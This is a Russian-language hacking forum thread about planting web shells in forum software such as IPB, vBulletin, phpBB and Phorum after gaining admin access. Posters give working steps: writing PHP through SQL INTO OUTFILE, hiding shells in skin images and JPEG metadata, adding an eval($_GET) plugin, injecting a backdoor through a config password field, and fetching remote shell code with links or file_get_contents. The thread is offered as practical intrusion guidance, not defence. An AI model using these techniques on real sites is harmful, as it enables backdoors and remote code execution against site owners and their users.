Форумы [Заливка шелла в Форуме]

Discussion in 'Уязвимости CMS/форумов' started by OMG!!, 21 Apr 2008.

  1. OMG!!

    OMG!! Elder - Старейшина

    Joined:
    25 Feb 2008
    Messages:
    231
    Likes Received:
    70
    Reputations:
    -3
    Заливка шелла в Форуме

    Решил собрать все вместе, да бы уменьшить бояновые темы в разделе. Все вопросы, касающиеся заливки шелла в Форуме, задаем сюда. Приветствуется помощь в наполнении темы актуальным материалом.​

    He11.net Forums 1
    Ikonboard 1,2
    IPB 1,2
    Pehota Forum 1
    PHPbb 1,2,3,4
    SMDS Forum 1
    SMF 1
    SowiBB 1
    vBulletin 1,2
    VumFOrum 1
    WR 1
    © ZAMUT
    ----------------------------------------------------------------------
    Имею полную админку в IPB 1.3, шел через смайлы не катит - ибо там стоят права на запись.. единственная папка с 777 - это uploads, так вот.. моя цель - это залить шелл в эту папку.. действия таковы.
    Создаю базу..
    Заливаю код
    Code:
    INSERT INTO `shell` bla bla..
    и выдираю его в файл
    Code:
    SELECT ("код шела") INTO OUTFILE '/var/www/forum/uploads/counter.php';
    Загвозка, в том.. что в код вставляются слешы.. из-за них не работает шел.. я уже даж делал c LINE терминатеж бай.. вообщем, не знаю, как избавится от слешей в коде. Ввиду сегодняшнего гуглежа узнал, что они находятся на уровне php.ini. Прошу помощи в составлении запроса.


    added@ на запросы внимания не обращайте.. писал машинально.
     
    #1 OMG!!, 21 Apr 2008
    Last edited by a moderator: 20 Apr 2009
    1 person likes this.
  2. c0m

    c0m Elder - Старейшина

    Joined:
    26 Jan 2007
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    проще через шаблон
    заливаешь скин, далее картинки с шеллом в скин, удаляешь скин... картинки с шеллами остаются...
    если нужно скину такой скин
     
  3. c0m

    c0m Elder - Старейшина

    Joined:
    26 Jan 2007
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    В общем все просто
    находим доступ в админку, заходим
    Далее - Внешний Вид
    тут:
    Если скин IP.Board Pro то делаем так:
    1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
    2. Импорт и экспорт стилей - Импорт... - Импорт изображений
    выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
    узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
    Директория с изображениями - ip.boardpr1228455805 (в моем случае)
    Изменяем так как было изночально.

    Шелл будет доступен в директории
    http://site/style_images/ip.boardpr1228455805/folder_js_skin/js_skin.php

    Если нет скина IP.Board Pro
    делаем так:
    Импорт и экспорт стилей - Импорт... - Импорт шаблонов стиля
    1. Импорт шаблонов стиля
    выбираем ipb_skin-ip.boardpr.xml.gz (Какую директорию с изображениями использовать в этом стиле? - Никакую)
    Залили.. далее
    2. Импорт изображений
    выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? - там будет что-то типо IP.Board Pro)
    импортировали...
    опять таки заходим в настройки скина, смотрим адресс директории
    http://site/style_images/ip.boardpr/folder_js_skin/js_skin.php
    и не забудьте его удалить, шаблоны удалятся, а картинки нет =)


    Объясняю как сделать скин с шеллами
    1. Ставим себе форум.
    2. Закидываем в папку forum/style_images/нужный вам скин шеллы куда вам нужно.
    3. Заходим в админку форума Внешний Вид - Импорт и экспорт стилей - Экспорт...
    Какой стиль экспортировать? - выбираем какой нужен
    Экспорт изображений
    Какие изображения экспортировать? - выбираем папку с шеллами.

    http://upload.com.ua/get/900580228 - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал
     
    1 person likes this.
  4. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    2 schut123

    Правил картинку вставлял в нее код.
    Сделать можно сохранив картинку в фотошопе и открыв hiew найти мето где написанно "Photoshop ....." менял на php код. Если перед этим открыть в паинте и сохранить место сдвинется ближе к начату файла что лучше.
    Загружал картинку на сервер через админку способов я помню там полно.
    Потом в админке форума создавал новую задачу прописывал путь к картинке и жал выполнить.

    Картинка jpg

    В конфигурации можно изменить пути к директории на чтото типа ../../../../../tmp чтобы не париться с путями
     
    #4 dr.Pilulkin, 5 Jan 2009
    Last edited: 5 Jan 2009
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,589
    Likes Received:
    406
    Reputations:
    196
    Код шелла можно и без кавычек делать - например простенький -
    <?php eval($_GET[5]); ?>
     
  6. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    можно без кавычек как сказали выше можно через функцию char(), можно в HEX-формате
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    RazyKK Замени пробел . Всё индивидуально, но попробуй например так:
    ls$IFS-la
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    RazyKK попробуй по одному ввести, тоесть сначала which lynx потом which wget и т.д.

    Заливка links
    links -source "http://откуда/shell.php" > /папка/куда/shell.php
     
  9. kolenwal

    kolenwal New Member

    Joined:
    13 Dec 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    1) Вкладка общие --> Безопасность
    Разрешить php в шаблонах: Да
    2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
    С помощью встроенного редактора шаблонов выбираем файл и пишем в него:
    Код:

    <!-- PHP --> phpinfo(); <!-- ENDPHP -->


    Далее применяем шаблон, идем на измененную страницу и видим наш php код

    Этот способ описал DeepXhadow за что ему +
     
    1 person likes this.
  10. monolog

    monolog Banned

    Joined:
    15 Aug 2009
    Messages:
    7
    Likes Received:
    7
    Reputations:
    5
    узнать путь не особая проблема:
    1. поюзай гугл inurl:site.com "error"
    2. просканируй сайт на дириктории (часто бывают случаи что открыты дирриктории в которых лежат php скрипты, которые при примом открытии выдают ошибку синтаксическу ну и раскрытие)
    3. потыкай скрипты что кроме форумного движка стоят (если есть)
    4. реверс айпи, тыкаешь другие сайты на поиск раскрытия путей (часто случается что путь выглядет /usr/home/domain.com/htdocs/; /usr/home/domain2.com/htdocs/)
    включи мозги
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    1. Заходим в админку.
    2. Система модулей.
    3. Добавить новый модуль.
    Продукт: ставим vBulletin
    Месторасположение: faq_complete
    Код: eval($_GET[e]);
    
    потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
    льем шелл, возвращаемся в админку, удаляем модуль faq_complete
     
    #11 Pashkela, 26 Aug 2009
    Last edited by a moderator: 21 Jun 2010
    1 person likes this.
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    можно так попробовать:

    вариант1:

    Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

    select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

    полный путь можно посмотреть так:

    ->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

    Тестилось на IBP 3.0.1 nulled

    шелл: http://site.ru/uploads/shell.php

    PS: Нужны соответствующие права

    вариант2:

    Форумы->Прикрепляемые файлы->Типы файлов

    жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

    Топаем в свой профиль:

    http://site.ru/index.php?app=core&module=usercp&tab=members&area=avatar

    грузим аву-шелл с расширением php3 и получаем шелл по адресу:

    http://site.ru/uploads/av-1.php3
     
    #12 Pashkela, 19 Dec 2009
    Last edited: 19 Dec 2009
  13. Внучёк

    Внучёк New Member

    Joined:
    16 Oct 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Отлично Пашкела в + 4 из 3 в держки по думаю в чем косяк, но все же
     
  14. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    2,002
    Likes Received:
    899
    Reputations:
    198
    Версия: phorum-3.4.6
    Зависимости: Нужны права админа.

    Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл:
    Code:
    C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.php
    Что дает нам возможность внедрить в конфиги пару своих строк =)
    Последние строки в конфиг файле:

    PHP:
      // database variables
      
    $PHORUM['DatabaseServer']='';
      
    $PHORUM['DatabaseName']='';
      
    $PHORUM['DatabaseUser']='';
      
    $PHORUM['DatabasePassword']='';

    ?>
    Чтоб не нарушить структуру файла, идем в раздел Конфигурации БД:
    Code:
    http://www.SITE.COM/forum/admin/index.php?page=db
    В поле Password: дописываем к текущему паролю строку:
    Code:
    '; @eval(stripslashes($_GET['cmd'])); echo '
    
    И получаем бэкдор по пути:
    Code:
    http://www.SITE.COM/forum/admin/settings/forums.php
     
    _________________________
    1 person likes this.
  15. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    пробывал залить шелл способом пашкеллы. phpinfo показывает, но погда уже прописываю /faq.php?e=wget линк на шелл
    пишет
    Code:
    Parse error: syntax error, unexpected T_STRING in
    public_html/faq.php(324) : eval()'d code(1) : eval()'d code on line 1
    код в модуле
    Code:
    eval($_GET[e]);
     
  16. tack3r

    tack3r New Member

    Joined:
    9 Apr 2009
    Messages:
    220
    Likes Received:
    4
    Reputations:
    0
    все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();
    а где тут загружать шелл найти не могу. Помогите кто сталкивался
     
  17. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале <?php и в конце ?> После вместо phpinfo(); вставляем
    eval(file_get_contents('http://site.com/shell.txt'));
     
  18. nikotin49

    nikotin49 New Member

    Joined:
    20 Jul 2011
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста как залить php шелл на vbulletin 3.xx - 4.xx очень нужно
     
  19. nikotin49

    nikotin49 New Member

    Joined:
    20 Jul 2011
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    Попробывал данный способ нечего не вышло(( показывает что маркер безопастности отсутствует после ввода пароля входа в шелл
     
    #19 nikotin49, 8 Nov 2011
    Last edited: 8 Nov 2011
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,589
    Likes Received:
    406
    Reputations:
    196
    Просто шелл залей сразу
     
Loading...